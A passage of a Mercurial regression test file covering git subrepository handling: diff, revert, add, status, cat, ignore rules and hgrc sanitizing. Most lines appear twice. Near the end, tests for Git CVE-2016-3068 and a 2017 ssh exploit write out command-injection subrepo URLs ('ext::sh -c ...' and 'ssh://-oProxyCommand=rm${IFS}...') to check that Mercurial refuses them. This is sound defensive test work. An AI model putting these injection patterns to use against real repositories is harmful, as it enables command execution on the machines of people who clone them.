666 $ git add .hg sub
666 $ git add .hg sub
667 $ git commit -qm 'add .hg/hgrc to be sanitized at hg update (git merge --ff)'
667 $ git commit -qm 'add .hg/hgrc to be sanitized at hg update (git merge --ff)'
668 $ git push -q origin testing
668 $ git push -q origin testing
669 $ cd ..
669 $ cd ..
670 $ grep ' s$' .hgsubstate
670 $ grep ' s$' .hgsubstate
671 32a343883b74769118bb1d3b4b1fbf9156f4dddc s
671 32a343883b74769118bb1d3b4b1fbf9156f4dddc s
672 $ hg commit -qm 'commit with git revision including .hg/hgrc'
672 $ hg commit -qm 'commit with git revision including .hg/hgrc'
673 $ hg parents -q
673 $ hg parents -q
674 9:ed23f7fe024e
674 9:ed23f7fe024e
675 $ grep ' s$' .hgsubstate
675 $ grep ' s$' .hgsubstate
676 f262643c1077219fbd3858d54e78ef050ef84fbf s
676 f262643c1077219fbd3858d54e78ef050ef84fbf s
677 $ cd ..
677 $ cd ..
678
678
679 $ cd tc
679 $ cd tc
680 $ hg update -q -C af6d2edbb0d3
680 $ hg update -q -C af6d2edbb0d3
681 $ test -f s/.hg/hgrc
681 $ test -f s/.hg/hgrc
682 [1]
682 [1]
683 $ test -f s/sub/.hg/hgrc
683 $ test -f s/sub/.hg/hgrc
684 [1]
684 [1]
685 $ cd ..
685 $ cd ..
686 $ hg -R tc pull -q
686 $ hg -R tc pull -q
687 $ hg -R tc update -q -C ed23f7fe024e 2>&1 | sort
687 $ hg -R tc update -q -C ed23f7fe024e 2>&1 | sort
688 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/.hg' (glob)
688 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/.hg' (glob)
689 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/sub/.hg' (glob)
689 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/sub/.hg' (glob)
690 $ cd tc
690 $ cd tc
691 $ hg parents -q
691 $ hg parents -q
692 9:ed23f7fe024e
692 9:ed23f7fe024e
693 $ grep ' s$' .hgsubstate
693 $ grep ' s$' .hgsubstate
694 f262643c1077219fbd3858d54e78ef050ef84fbf s
694 f262643c1077219fbd3858d54e78ef050ef84fbf s
695 $ test -f s/.hg/hgrc
695 $ test -f s/.hg/hgrc
696 [1]
696 [1]
697 $ test -f s/sub/.hg/hgrc
697 $ test -f s/sub/.hg/hgrc
698 [1]
698 [1]
699
699
700 Test that sanitizing is omitted in meta data area:
700 Test that sanitizing is omitted in meta data area:
701
701
702 $ mkdir s/.git/.hg
702 $ mkdir s/.git/.hg
703 $ echo '.hg/hgrc in git metadata area' > s/.git/.hg/hgrc
703 $ echo '.hg/hgrc in git metadata area' > s/.git/.hg/hgrc
704 $ hg update -q -C af6d2edbb0d3
704 $ hg update -q -C af6d2edbb0d3
705 checking out detached HEAD in subrepository "s"
705 checking out detached HEAD in subrepository "s"
706 check out a git branch if you intend to make changes
706 check out a git branch if you intend to make changes
707
707
708 check differences made by most recent change
708 check differences made by most recent change
709 $ cd s
709 $ cd s
710 $ cat > foobar << EOF
710 $ cat > foobar << EOF
711 > woopwoop
711 > woopwoop
712 >
712 >
713 > foo
713 > foo
714 > bar
714 > bar
715 > EOF
715 > EOF
716 $ git add foobar
716 $ git add foobar
717 $ cd ..
717 $ cd ..
718
718
719 $ hg diff --subrepos
719 $ hg diff --subrepos
720 diff --git a/s/foobar b/s/foobar
720 diff --git a/s/foobar b/s/foobar
721 new file mode 100644
721 new file mode 100644
722 index 0000000..8a5a5e2
722 index 0000000..8a5a5e2
723 --- /dev/null
723 --- /dev/null
724 +++ b/s/foobar
724 +++ b/s/foobar
725 @@ -0,0 +1,4 @@
725 @@ -0,0 +1,4 @@
726 +woopwoop
726 +woopwoop
727 +
727 +
728 +foo
728 +foo
729 +bar
729 +bar
730
730
731 $ hg commit --subrepos -m "Added foobar"
731 $ hg commit --subrepos -m "Added foobar"
732 committing subrepository s
732 committing subrepository s
733 created new head
733 created new head
734
734
735 $ hg diff -c . --subrepos --nodates
735 $ hg diff -c . --subrepos --nodates
736 diff -r af6d2edbb0d3 -r 255ee8cf690e .hgsubstate
736 diff -r af6d2edbb0d3 -r 255ee8cf690e .hgsubstate
737 --- a/.hgsubstate
737 --- a/.hgsubstate
738 +++ b/.hgsubstate
738 +++ b/.hgsubstate
739 @@ -1,1 +1,1 @@
739 @@ -1,1 +1,1 @@
740 -32a343883b74769118bb1d3b4b1fbf9156f4dddc s
740 -32a343883b74769118bb1d3b4b1fbf9156f4dddc s
741 +fd4dbf828a5b2fcd36b2bcf21ea773820970d129 s
741 +fd4dbf828a5b2fcd36b2bcf21ea773820970d129 s
742 diff --git a/s/foobar b/s/foobar
742 diff --git a/s/foobar b/s/foobar
743 new file mode 100644
743 new file mode 100644
744 index 0000000..8a5a5e2
744 index 0000000..8a5a5e2
745 --- /dev/null
745 --- /dev/null
746 +++ b/s/foobar
746 +++ b/s/foobar
747 @@ -0,0 +1,4 @@
747 @@ -0,0 +1,4 @@
748 +woopwoop
748 +woopwoop
749 +
749 +
750 +foo
750 +foo
751 +bar
751 +bar
752
752
753 check output when only diffing the subrepository
753 check output when only diffing the subrepository
754 $ hg diff -c . --subrepos s
754 $ hg diff -c . --subrepos s
755 diff --git a/s/foobar b/s/foobar
755 diff --git a/s/foobar b/s/foobar
756 new file mode 100644
756 new file mode 100644
757 index 0000000..8a5a5e2
757 index 0000000..8a5a5e2
758 --- /dev/null
758 --- /dev/null
759 +++ b/s/foobar
759 +++ b/s/foobar
760 @@ -0,0 +1,4 @@
760 @@ -0,0 +1,4 @@
761 +woopwoop
761 +woopwoop
762 +
762 +
763 +foo
763 +foo
764 +bar
764 +bar
765
765
766 check output when diffing something else
766 check output when diffing something else
767 $ hg diff -c . --subrepos .hgsubstate --nodates
767 $ hg diff -c . --subrepos .hgsubstate --nodates
768 diff -r af6d2edbb0d3 -r 255ee8cf690e .hgsubstate
768 diff -r af6d2edbb0d3 -r 255ee8cf690e .hgsubstate
769 --- a/.hgsubstate
769 --- a/.hgsubstate
770 +++ b/.hgsubstate
770 +++ b/.hgsubstate
771 @@ -1,1 +1,1 @@
771 @@ -1,1 +1,1 @@
772 -32a343883b74769118bb1d3b4b1fbf9156f4dddc s
772 -32a343883b74769118bb1d3b4b1fbf9156f4dddc s
773 +fd4dbf828a5b2fcd36b2bcf21ea773820970d129 s
773 +fd4dbf828a5b2fcd36b2bcf21ea773820970d129 s
774
774
775 add new changes, including whitespace
775 add new changes, including whitespace
776 $ cd s
776 $ cd s
777 $ cat > foobar << EOF
777 $ cat > foobar << EOF
778 > woop woop
778 > woop woop
779 >
779 >
780 > foo
780 > foo
781 > bar
781 > bar
782 > EOF
782 > EOF
783 $ echo foo > barfoo
783 $ echo foo > barfoo
784 $ git add barfoo
784 $ git add barfoo
785 $ cd ..
785 $ cd ..
786
786
787 $ hg diff --subrepos --ignore-all-space
787 $ hg diff --subrepos --ignore-all-space
788 diff --git a/s/barfoo b/s/barfoo
788 diff --git a/s/barfoo b/s/barfoo
789 new file mode 100644
789 new file mode 100644
790 index 0000000..257cc56
790 index 0000000..257cc56
791 --- /dev/null
791 --- /dev/null
792 +++ b/s/barfoo
792 +++ b/s/barfoo
793 @@ -0,0 +1* @@ (glob)
793 @@ -0,0 +1* @@ (glob)
794 +foo
794 +foo
795 $ hg diff --subrepos s/foobar
795 $ hg diff --subrepos s/foobar
796 diff --git a/s/foobar b/s/foobar
796 diff --git a/s/foobar b/s/foobar
797 index 8a5a5e2..bd5812a 100644
797 index 8a5a5e2..bd5812a 100644
798 --- a/s/foobar
798 --- a/s/foobar
799 +++ b/s/foobar
799 +++ b/s/foobar
800 @@ -1,4 +1,4 @@
800 @@ -1,4 +1,4 @@
801 -woopwoop
801 -woopwoop
802 +woop woop
802 +woop woop
803
803
804 foo
804 foo
805 bar
805 bar
806
806
807 execute a diffstat
807 execute a diffstat
808 the output contains a regex, because git 1.7.10 and 1.7.11
808 the output contains a regex, because git 1.7.10 and 1.7.11
809 change the amount of whitespace
809 change the amount of whitespace
810 $ hg diff --subrepos --stat
810 $ hg diff --subrepos --stat
811 \s*barfoo |\s*1 + (re)
811 \s*barfoo |\s*1 + (re)
812 \s*foobar |\s*2 +- (re)
812 \s*foobar |\s*2 +- (re)
813 2 files changed, 2 insertions\(\+\), 1 deletions?\(-\) (re)
813 2 files changed, 2 insertions\(\+\), 1 deletions?\(-\) (re)
814
814
815 adding an include should ignore the other elements
815 adding an include should ignore the other elements
816 $ hg diff --subrepos -I s/foobar
816 $ hg diff --subrepos -I s/foobar
817 diff --git a/s/foobar b/s/foobar
817 diff --git a/s/foobar b/s/foobar
818 index 8a5a5e2..bd5812a 100644
818 index 8a5a5e2..bd5812a 100644
819 --- a/s/foobar
819 --- a/s/foobar
820 +++ b/s/foobar
820 +++ b/s/foobar
821 @@ -1,4 +1,4 @@
821 @@ -1,4 +1,4 @@
822 -woopwoop
822 -woopwoop
823 +woop woop
823 +woop woop
824
824
825 foo
825 foo
826 bar
826 bar
827
827
828 adding an exclude should ignore this element
828 adding an exclude should ignore this element
829 $ hg diff --subrepos -X s/foobar
829 $ hg diff --subrepos -X s/foobar
830 diff --git a/s/barfoo b/s/barfoo
830 diff --git a/s/barfoo b/s/barfoo
831 new file mode 100644
831 new file mode 100644
832 index 0000000..257cc56
832 index 0000000..257cc56
833 --- /dev/null
833 --- /dev/null
834 +++ b/s/barfoo
834 +++ b/s/barfoo
835 @@ -0,0 +1* @@ (glob)
835 @@ -0,0 +1* @@ (glob)
836 +foo
836 +foo
837
837
838 moving a file should show a removal and an add
838 moving a file should show a removal and an add
839 $ hg revert --all
839 $ hg revert --all
840 reverting subrepo ../gitroot
840 reverting subrepo ../gitroot
841 $ cd s
841 $ cd s
842 $ git mv foobar woop
842 $ git mv foobar woop
843 $ cd ..
843 $ cd ..
844 $ hg diff --subrepos
844 $ hg diff --subrepos
845 diff --git a/s/foobar b/s/foobar
845 diff --git a/s/foobar b/s/foobar
846 deleted file mode 100644
846 deleted file mode 100644
847 index 8a5a5e2..0000000
847 index 8a5a5e2..0000000
848 --- a/s/foobar
848 --- a/s/foobar
849 +++ /dev/null
849 +++ /dev/null
850 @@ -1,4 +0,0 @@
850 @@ -1,4 +0,0 @@
851 -woopwoop
851 -woopwoop
852 -
852 -
853 -foo
853 -foo
854 -bar
854 -bar
855 diff --git a/s/woop b/s/woop
855 diff --git a/s/woop b/s/woop
856 new file mode 100644
856 new file mode 100644
857 index 0000000..8a5a5e2
857 index 0000000..8a5a5e2
858 --- /dev/null
858 --- /dev/null
859 +++ b/s/woop
859 +++ b/s/woop
860 @@ -0,0 +1,4 @@
860 @@ -0,0 +1,4 @@
861 +woopwoop
861 +woopwoop
862 +
862 +
863 +foo
863 +foo
864 +bar
864 +bar
865 $ rm s/woop
865 $ rm s/woop
866
866
867 revert the subrepository
867 revert the subrepository
868 $ hg revert --all
868 $ hg revert --all
869 reverting subrepo ../gitroot
869 reverting subrepo ../gitroot
870
870
871 $ hg status --subrepos
871 $ hg status --subrepos
872 ? s/barfoo
872 ? s/barfoo
873 ? s/foobar.orig
873 ? s/foobar.orig
874
874
875 $ mv s/foobar.orig s/foobar
875 $ mv s/foobar.orig s/foobar
876
876
877 $ hg revert --no-backup s
877 $ hg revert --no-backup s
878 reverting subrepo ../gitroot
878 reverting subrepo ../gitroot
879
879
880 $ hg status --subrepos
880 $ hg status --subrepos
881 ? s/barfoo
881 ? s/barfoo
882
882
883 revert moves orig files to the right place
883 revert moves orig files to the right place
884 $ echo 'bloop' > s/foobar
884 $ echo 'bloop' > s/foobar
885 $ hg revert --all --verbose --config 'ui.origbackuppath=.hg/origbackups'
885 $ hg revert --all --verbose --config 'ui.origbackuppath=.hg/origbackups'
886 reverting subrepo ../gitroot
886 reverting subrepo ../gitroot
887 creating directory: $TESTTMP/tc/.hg/origbackups (glob)
887 creating directory: $TESTTMP/tc/.hg/origbackups (glob)
888 saving current version of foobar as $TESTTMP/tc/.hg/origbackups/foobar.orig (glob)
888 saving current version of foobar as $TESTTMP/tc/.hg/origbackups/foobar.orig (glob)
889 $ ls .hg/origbackups
889 $ ls .hg/origbackups
890 foobar.orig
890 foobar.orig
891 $ rm -rf .hg/origbackups
891 $ rm -rf .hg/origbackups
892
892
893 show file at specific revision
893 show file at specific revision
894 $ cat > s/foobar << EOF
894 $ cat > s/foobar << EOF
895 > woop woop
895 > woop woop
896 > fooo bar
896 > fooo bar
897 > EOF
897 > EOF
898 $ hg commit --subrepos -m "updated foobar"
898 $ hg commit --subrepos -m "updated foobar"
899 committing subrepository s
899 committing subrepository s
900 $ cat > s/foobar << EOF
900 $ cat > s/foobar << EOF
901 > current foobar
901 > current foobar
902 > (should not be visible using hg cat)
902 > (should not be visible using hg cat)
903 > EOF
903 > EOF
904
904
905 $ hg cat -r . s/foobar
905 $ hg cat -r . s/foobar
906 woop woop
906 woop woop
907 fooo bar (no-eol)
907 fooo bar (no-eol)
908 $ hg cat -r "parents(.)" s/foobar > catparents
908 $ hg cat -r "parents(.)" s/foobar > catparents
909
909
910 $ mkdir -p tmp/s
910 $ mkdir -p tmp/s
911
911
912 $ hg cat -r "parents(.)" --output tmp/%% s/foobar
912 $ hg cat -r "parents(.)" --output tmp/%% s/foobar
913 $ diff tmp/% catparents
913 $ diff tmp/% catparents
914
914
915 $ hg cat -r "parents(.)" --output tmp/%s s/foobar
915 $ hg cat -r "parents(.)" --output tmp/%s s/foobar
916 $ diff tmp/foobar catparents
916 $ diff tmp/foobar catparents
917
917
918 $ hg cat -r "parents(.)" --output tmp/%d/otherfoobar s/foobar
918 $ hg cat -r "parents(.)" --output tmp/%d/otherfoobar s/foobar
919 $ diff tmp/s/otherfoobar catparents
919 $ diff tmp/s/otherfoobar catparents
920
920
921 $ hg cat -r "parents(.)" --output tmp/%p s/foobar
921 $ hg cat -r "parents(.)" --output tmp/%p s/foobar
922 $ diff tmp/s/foobar catparents
922 $ diff tmp/s/foobar catparents
923
923
924 $ hg cat -r "parents(.)" --output tmp/%H s/foobar
924 $ hg cat -r "parents(.)" --output tmp/%H s/foobar
925 $ diff tmp/255ee8cf690ec86e99b1e80147ea93ece117cd9d catparents
925 $ diff tmp/255ee8cf690ec86e99b1e80147ea93ece117cd9d catparents
926
926
927 $ hg cat -r "parents(.)" --output tmp/%R s/foobar
927 $ hg cat -r "parents(.)" --output tmp/%R s/foobar
928 $ diff tmp/10 catparents
928 $ diff tmp/10 catparents
929
929
930 $ hg cat -r "parents(.)" --output tmp/%h s/foobar
930 $ hg cat -r "parents(.)" --output tmp/%h s/foobar
931 $ diff tmp/255ee8cf690e catparents
931 $ diff tmp/255ee8cf690e catparents
932
932
933 $ rm tmp/10
933 $ rm tmp/10
934 $ hg cat -r "parents(.)" --output tmp/%r s/foobar
934 $ hg cat -r "parents(.)" --output tmp/%r s/foobar
935 $ diff tmp/10 catparents
935 $ diff tmp/10 catparents
936
936
937 $ mkdir tmp/tc
937 $ mkdir tmp/tc
938 $ hg cat -r "parents(.)" --output tmp/%b/foobar s/foobar
938 $ hg cat -r "parents(.)" --output tmp/%b/foobar s/foobar
939 $ diff tmp/tc/foobar catparents
939 $ diff tmp/tc/foobar catparents
940
940
941 cleanup
941 cleanup
942 $ rm -r tmp
942 $ rm -r tmp
943 $ rm catparents
943 $ rm catparents
944
944
945 add git files, using either files or patterns
945 add git files, using either files or patterns
946 $ echo "hsss! hsssssssh!" > s/snake.python
946 $ echo "hsss! hsssssssh!" > s/snake.python
947 $ echo "ccc" > s/c.c
947 $ echo "ccc" > s/c.c
948 $ echo "cpp" > s/cpp.cpp
948 $ echo "cpp" > s/cpp.cpp
949
949
950 $ hg add s/snake.python s/c.c s/cpp.cpp
950 $ hg add s/snake.python s/c.c s/cpp.cpp
951 $ hg st --subrepos s
951 $ hg st --subrepos s
952 M s/foobar
952 M s/foobar
953 A s/c.c
953 A s/c.c
954 A s/cpp.cpp
954 A s/cpp.cpp
955 A s/snake.python
955 A s/snake.python
956 ? s/barfoo
956 ? s/barfoo
957 $ hg revert s
957 $ hg revert s
958 reverting subrepo ../gitroot
958 reverting subrepo ../gitroot
959
959
960 $ hg add --subrepos "glob:**.python"
960 $ hg add --subrepos "glob:**.python"
961 adding s/snake.python (glob)
961 adding s/snake.python (glob)
962 $ hg st --subrepos s
962 $ hg st --subrepos s
963 A s/snake.python
963 A s/snake.python
964 ? s/barfoo
964 ? s/barfoo
965 ? s/c.c
965 ? s/c.c
966 ? s/cpp.cpp
966 ? s/cpp.cpp
967 ? s/foobar.orig
967 ? s/foobar.orig
968 $ hg revert s
968 $ hg revert s
969 reverting subrepo ../gitroot
969 reverting subrepo ../gitroot
970
970
971 $ hg add --subrepos s
971 $ hg add --subrepos s
972 adding s/barfoo (glob)
972 adding s/barfoo (glob)
973 adding s/c.c (glob)
973 adding s/c.c (glob)
974 adding s/cpp.cpp (glob)
974 adding s/cpp.cpp (glob)
975 adding s/foobar.orig (glob)
975 adding s/foobar.orig (glob)
976 adding s/snake.python (glob)
976 adding s/snake.python (glob)
977 $ hg st --subrepos s
977 $ hg st --subrepos s
978 A s/barfoo
978 A s/barfoo
979 A s/c.c
979 A s/c.c
980 A s/cpp.cpp
980 A s/cpp.cpp
981 A s/foobar.orig
981 A s/foobar.orig
982 A s/snake.python
982 A s/snake.python
983 $ hg revert s
983 $ hg revert s
984 reverting subrepo ../gitroot
984 reverting subrepo ../gitroot
985 make sure everything is reverted correctly
985 make sure everything is reverted correctly
986 $ hg st --subrepos s
986 $ hg st --subrepos s
987 ? s/barfoo
987 ? s/barfoo
988 ? s/c.c
988 ? s/c.c
989 ? s/cpp.cpp
989 ? s/cpp.cpp
990 ? s/foobar.orig
990 ? s/foobar.orig
991 ? s/snake.python
991 ? s/snake.python
992
992
993 $ hg add --subrepos --exclude "path:s/c.c"
993 $ hg add --subrepos --exclude "path:s/c.c"
994 adding s/barfoo (glob)
994 adding s/barfoo (glob)
995 adding s/cpp.cpp (glob)
995 adding s/cpp.cpp (glob)
996 adding s/foobar.orig (glob)
996 adding s/foobar.orig (glob)
997 adding s/snake.python (glob)
997 adding s/snake.python (glob)
998 $ hg st --subrepos s
998 $ hg st --subrepos s
999 A s/barfoo
999 A s/barfoo
1000 A s/cpp.cpp
1000 A s/cpp.cpp
1001 A s/foobar.orig
1001 A s/foobar.orig
1002 A s/snake.python
1002 A s/snake.python
1003 ? s/c.c
1003 ? s/c.c
1004 $ hg revert --all -q
1004 $ hg revert --all -q
1005
1005
1006 .hgignore should not have influence in subrepos
1006 .hgignore should not have influence in subrepos
1007 $ cat > .hgignore << EOF
1007 $ cat > .hgignore << EOF
1008 > syntax: glob
1008 > syntax: glob
1009 > *.python
1009 > *.python
1010 > EOF
1010 > EOF
1011 $ hg add .hgignore
1011 $ hg add .hgignore
1012 $ hg add --subrepos "glob:**.python" s/barfoo
1012 $ hg add --subrepos "glob:**.python" s/barfoo
1013 adding s/snake.python (glob)
1013 adding s/snake.python (glob)
1014 $ hg st --subrepos s
1014 $ hg st --subrepos s
1015 A s/barfoo
1015 A s/barfoo
1016 A s/snake.python
1016 A s/snake.python
1017 ? s/c.c
1017 ? s/c.c
1018 ? s/cpp.cpp
1018 ? s/cpp.cpp
1019 ? s/foobar.orig
1019 ? s/foobar.orig
1020 $ hg revert --all -q
1020 $ hg revert --all -q
1021
1021
1022 .gitignore should have influence,
1022 .gitignore should have influence,
1023 except for explicitly added files (no patterns)
1023 except for explicitly added files (no patterns)
1024 $ cat > s/.gitignore << EOF
1024 $ cat > s/.gitignore << EOF
1025 > *.python
1025 > *.python
1026 > EOF
1026 > EOF
1027 $ hg add s/.gitignore
1027 $ hg add s/.gitignore
1028 $ hg st --subrepos s
1028 $ hg st --subrepos s
1029 A s/.gitignore
1029 A s/.gitignore
1030 ? s/barfoo
1030 ? s/barfoo
1031 ? s/c.c
1031 ? s/c.c
1032 ? s/cpp.cpp
1032 ? s/cpp.cpp
1033 ? s/foobar.orig
1033 ? s/foobar.orig
1034 $ hg st --subrepos s --all
1034 $ hg st --subrepos s --all
1035 A s/.gitignore
1035 A s/.gitignore
1036 ? s/barfoo
1036 ? s/barfoo
1037 ? s/c.c
1037 ? s/c.c
1038 ? s/cpp.cpp
1038 ? s/cpp.cpp
1039 ? s/foobar.orig
1039 ? s/foobar.orig
1040 I s/snake.python
1040 I s/snake.python
1041 C s/f
1041 C s/f
1042 C s/foobar
1042 C s/foobar
1043 C s/g
1043 C s/g
1044 $ hg add --subrepos "glob:**.python"
1044 $ hg add --subrepos "glob:**.python"
1045 $ hg st --subrepos s
1045 $ hg st --subrepos s
1046 A s/.gitignore
1046 A s/.gitignore
1047 ? s/barfoo
1047 ? s/barfoo
1048 ? s/c.c
1048 ? s/c.c
1049 ? s/cpp.cpp
1049 ? s/cpp.cpp
1050 ? s/foobar.orig
1050 ? s/foobar.orig
1051 $ hg add --subrepos s/snake.python
1051 $ hg add --subrepos s/snake.python
1052 $ hg st --subrepos s
1052 $ hg st --subrepos s
1053 A s/.gitignore
1053 A s/.gitignore
1054 A s/snake.python
1054 A s/snake.python
1055 ? s/barfoo
1055 ? s/barfoo
1056 ? s/c.c
1056 ? s/c.c
1057 ? s/cpp.cpp
1057 ? s/cpp.cpp
1058 ? s/foobar.orig
1058 ? s/foobar.orig
1059
1059
1060 correctly do a dry run
1060 correctly do a dry run
1061 $ hg add --subrepos s --dry-run
1061 $ hg add --subrepos s --dry-run
1062 adding s/barfoo (glob)
1062 adding s/barfoo (glob)
1063 adding s/c.c (glob)
1063 adding s/c.c (glob)
1064 adding s/cpp.cpp (glob)
1064 adding s/cpp.cpp (glob)
1065 adding s/foobar.orig (glob)
1065 adding s/foobar.orig (glob)
1066 $ hg st --subrepos s
1066 $ hg st --subrepos s
1067 A s/.gitignore
1067 A s/.gitignore
1068 A s/snake.python
1068 A s/snake.python
1069 ? s/barfoo
1069 ? s/barfoo
1070 ? s/c.c
1070 ? s/c.c
1071 ? s/cpp.cpp
1071 ? s/cpp.cpp
1072 ? s/foobar.orig
1072 ? s/foobar.orig
1073
1073
1074 error given when adding an already tracked file
1074 error given when adding an already tracked file
1075 $ hg add s/.gitignore
1075 $ hg add s/.gitignore
1076 s/.gitignore already tracked!
1076 s/.gitignore already tracked!
1077 [1]
1077 [1]
1078 $ hg add s/g
1078 $ hg add s/g
1079 s/g already tracked!
1079 s/g already tracked!
1080 [1]
1080 [1]
1081
1081
1082 removed files can be re-added
1082 removed files can be re-added
1083 removing files using 'rm' or 'git rm' has the same effect,
1083 removing files using 'rm' or 'git rm' has the same effect,
1084 since we ignore the staging area
1084 since we ignore the staging area
1085 $ hg ci --subrepos -m 'snake'
1085 $ hg ci --subrepos -m 'snake'
1086 committing subrepository s
1086 committing subrepository s
1087 $ cd s
1087 $ cd s
1088 $ rm snake.python
1088 $ rm snake.python
1089 (remove leftover .hg so Mercurial doesn't look for a root here)
1089 (remove leftover .hg so Mercurial doesn't look for a root here)
1090 $ rm -rf .hg
1090 $ rm -rf .hg
1091 $ hg status --subrepos --all .
1091 $ hg status --subrepos --all .
1092 R snake.python
1092 R snake.python
1093 ? barfoo
1093 ? barfoo
1094 ? c.c
1094 ? c.c
1095 ? cpp.cpp
1095 ? cpp.cpp
1096 ? foobar.orig
1096 ? foobar.orig
1097 C .gitignore
1097 C .gitignore
1098 C f
1098 C f
1099 C foobar
1099 C foobar
1100 C g
1100 C g
1101 $ git rm snake.python
1101 $ git rm snake.python
1102 rm 'snake.python'
1102 rm 'snake.python'
1103 $ hg status --subrepos --all .
1103 $ hg status --subrepos --all .
1104 R snake.python
1104 R snake.python
1105 ? barfoo
1105 ? barfoo
1106 ? c.c
1106 ? c.c
1107 ? cpp.cpp
1107 ? cpp.cpp
1108 ? foobar.orig
1108 ? foobar.orig
1109 C .gitignore
1109 C .gitignore
1110 C f
1110 C f
1111 C foobar
1111 C foobar
1112 C g
1112 C g
1113 $ touch snake.python
1113 $ touch snake.python
1114 $ cd ..
1114 $ cd ..
1115 $ hg add s/snake.python
1115 $ hg add s/snake.python
1116 $ hg status -S
1116 $ hg status -S
1117 M s/snake.python
1117 M s/snake.python
1118 ? .hgignore
1118 ? .hgignore
1119 ? s/barfoo
1119 ? s/barfoo
1120 ? s/c.c
1120 ? s/c.c
1121 ? s/cpp.cpp
1121 ? s/cpp.cpp
1122 ? s/foobar.orig
1122 ? s/foobar.orig
1123 $ hg revert --all -q
1123 $ hg revert --all -q
1124
1124
1125 make sure we show changed files, rather than changed subtrees
1125 make sure we show changed files, rather than changed subtrees
1126 $ mkdir s/foo
1126 $ mkdir s/foo
1127 $ touch s/foo/bwuh
1127 $ touch s/foo/bwuh
1128 $ hg add s/foo/bwuh
1128 $ hg add s/foo/bwuh
1129 $ hg commit -S -m "add bwuh"
1129 $ hg commit -S -m "add bwuh"
1130 committing subrepository s
1130 committing subrepository s
1131 $ hg status -S --change .
1131 $ hg status -S --change .
1132 M .hgsubstate
1132 M .hgsubstate
1133 A s/foo/bwuh
1133 A s/foo/bwuh
1134 ? s/barfoo
1134 ? s/barfoo
1135 ? s/c.c
1135 ? s/c.c
1136 ? s/cpp.cpp
1136 ? s/cpp.cpp
1137 ? s/foobar.orig
1137 ? s/foobar.orig
1138 ? s/snake.python.orig
1138 ? s/snake.python.orig
1139
1139
1140 #if git19
1140 #if git19
1141
1141
1142 test for Git CVE-2016-3068
1142 test for Git CVE-2016-3068
1143 $ hg init malicious-subrepository
1143 $ hg init malicious-subrepository
1144 $ cd malicious-subrepository
1144 $ cd malicious-subrepository
1145 $ echo "s = [git]ext::sh -c echo% pwned:% \$PWNED_MSG% >pwned.txt" > .hgsub
1145 $ echo "s = [git]ext::sh -c echo% pwned:% \$PWNED_MSG% >pwned.txt" > .hgsub
1146 $ git init s
1146 $ git init s
1147 Initialized empty Git repository in $TESTTMP/tc/malicious-subrepository/s/.git/
1147 Initialized empty Git repository in $TESTTMP/tc/malicious-subrepository/s/.git/
1148 $ cd s
1148 $ cd s
1149 $ git commit --allow-empty -m 'empty'
1149 $ git commit --allow-empty -m 'empty'
1150 [master (root-commit) 153f934] empty
1150 [master (root-commit) 153f934] empty
1151 $ cd ..
1151 $ cd ..
1152 $ hg add .hgsub
1152 $ hg add .hgsub
1153 $ hg commit -m "add subrepo"
1153 $ hg commit -m "add subrepo"
1154 $ cd ..
1154 $ cd ..
1155 $ rm -f pwned.txt
1155 $ rm -f pwned.txt
1156 $ unset GIT_ALLOW_PROTOCOL
1156 $ unset GIT_ALLOW_PROTOCOL
1157 $ PWNED_MSG="your git is too old or mercurial has regressed" hg clone \
1157 $ PWNED_MSG="your git is too old or mercurial has regressed" hg clone \
1158 > malicious-subrepository malicious-subrepository-protected
1158 > malicious-subrepository malicious-subrepository-protected
1159 Cloning into '$TESTTMP/tc/malicious-subrepository-protected/s'... (glob)
1159 Cloning into '$TESTTMP/tc/malicious-subrepository-protected/s'... (glob)
1160 fatal: transport 'ext' not allowed
1160 fatal: transport 'ext' not allowed
1161 updating to branch default
1161 updating to branch default
1162 cloning subrepo s from ext::sh -c echo% pwned:% $PWNED_MSG% >pwned.txt
1162 cloning subrepo s from ext::sh -c echo% pwned:% $PWNED_MSG% >pwned.txt
1163 abort: git clone error 128 in s (in subrepository "s")
1163 abort: git clone error 128 in s (in subrepository "s")
1164 [255]
1164 [255]
1165 $ f -Dq pwned.txt
1165 $ f -Dq pwned.txt
1166 pwned.txt: file not found
1166 pwned.txt: file not found
1167
1167
1168 whitelisting of ext should be respected (that's the git submodule behaviour)
1168 whitelisting of ext should be respected (that's the git submodule behaviour)
1169 $ rm -f pwned.txt
1169 $ rm -f pwned.txt
1170 $ env GIT_ALLOW_PROTOCOL=ext PWNED_MSG="you asked for it" hg clone \
1170 $ env GIT_ALLOW_PROTOCOL=ext PWNED_MSG="you asked for it" hg clone \
1171 > malicious-subrepository malicious-subrepository-clone-allowed
1171 > malicious-subrepository malicious-subrepository-clone-allowed
1172 Cloning into '$TESTTMP/tc/malicious-subrepository-clone-allowed/s'... (glob)
1172 Cloning into '$TESTTMP/tc/malicious-subrepository-clone-allowed/s'... (glob)
1173 fatal: Could not read from remote repository.
1173 fatal: Could not read from remote repository.
1174
1174
1175 Please make sure you have the correct access rights
1175 Please make sure you have the correct access rights
1176 and the repository exists.
1176 and the repository exists.
1177 updating to branch default
1177 updating to branch default
1178 cloning subrepo s from ext::sh -c echo% pwned:% $PWNED_MSG% >pwned.txt
1178 cloning subrepo s from ext::sh -c echo% pwned:% $PWNED_MSG% >pwned.txt
1179 abort: git clone error 128 in s (in subrepository "s")
1179 abort: git clone error 128 in s (in subrepository "s")
1180 [255]
1180 [255]
1181 $ f -Dq pwned.txt
1181 $ f -Dq pwned.txt
1182 pwned: you asked for it
1182 pwned: you asked for it
1183
1183
1184 #endif
1184 #endif
1185
1186 test for ssh exploit with git subrepos 2017-07-25
1187
1188 $ hg init malicious-proxycommand
1189 $ cd malicious-proxycommand
1190 $ echo 's = [git]ssh://-oProxyCommand=rm${IFS}non-existent/path' > .hgsub
1191 $ git init s
1192 Initialized empty Git repository in $TESTTMP/tc/malicious-proxycommand/s/.git/
1193 $ cd s
1194 $ git commit --allow-empty -m 'empty'
1195 [master (root-commit) 153f934] empty
1196 $ cd ..
1197 $ hg add .hgsub
1198 $ hg ci -m 'add subrepo'
1199 $ cd ..
1200 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1201 updating to branch default
1202 abort: potentially unsafe url: 'ssh://-oProxyCommand=rm${IFS}non-existent/path' (in subrepository "s")
1203 [255]
1204
1205 also check that a percent encoded '-' (%2D) doesn't work
1206
1207 $ cd malicious-proxycommand
